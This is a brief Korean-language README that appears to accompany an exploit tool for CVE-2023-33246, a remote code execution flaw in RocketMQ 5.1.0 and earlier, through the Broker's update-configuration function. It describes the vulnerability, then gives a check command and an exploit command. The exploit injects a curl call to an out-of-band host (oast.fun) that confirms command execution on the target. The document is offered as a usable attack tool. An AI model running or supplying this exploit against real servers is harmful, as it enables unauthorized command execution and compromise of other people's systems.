
CVE-2023-33246 RocketMQ 원격 코드 실행 익스플로잇
RocketMQ 5.1.0 이하 버전은 임의 코드 삽입(Arbitrary Code Injection) 취약점에 영향을 받습니다. RocketMQ의 Broker 구성 요소가 외부 네트워크에 노출되어 있으며 권한 검증이 부족합니다. 공격자는 업데이트 구성 기능을 사용하여 RocketMQ가 실행 중인 시스템 사용자 권한으로 명령을 실행함으로써 이 취약점을 악용할 수 있습니다. 또한 공격자는 RocketMQ 프로토콜 콘텐츠를 위조하여 동일한 효과를 얻을 수 있습니다.
확인
./RocketMQRceCheck -host 127.0.0.1 -port 9876
악용
RocketMQ_RCE_EXPLOIT 127.0.0.1 10911 curl chw9ft72vtc00002z5k0ge6rz7eyyyyyb.oast.fun/test